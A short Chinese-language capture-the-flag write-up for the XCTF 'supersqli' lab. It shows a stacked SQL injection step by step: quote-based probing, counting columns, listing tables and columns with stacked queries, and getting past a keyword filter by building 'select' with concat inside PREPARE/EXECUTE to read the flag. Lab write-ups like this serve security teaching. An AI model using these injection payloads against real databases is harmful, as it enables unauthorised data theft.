本次采用的靶场xctf的supersqli
一、堆叠注入
进入靶场,发现一个提示框。先随便点一下提交,发现输出了些东西·。
输入1’,判断存在注入点。
分别输如1=1,1=2,判断为单引号注入。
1' and 1= 1%23
1' and 1= 2%23
判断字段数,得到字段数为2。
1' order by 2%23
判断数据库,但发现使用了正则过滤了关键字select|update|delete|drop|insert|where
由于无法使用select,想到了堆叠注入。
show columns from class; #返回当前表的列
show tables; #显示数据库中的列表
show databases; #显示MySQL中的列表
开始爆表名。
-1';show tables;%23
爆字段名
-1';show columns from `1919810931114514`;%23
ps: 其中1919810931114514两边是反引号。
一些函数链接
最后爆flag
-1';Set @sql=concat('s','elect flag from `1919810931114514`');Prepare sq from @sql;execute sq;%23
得到flag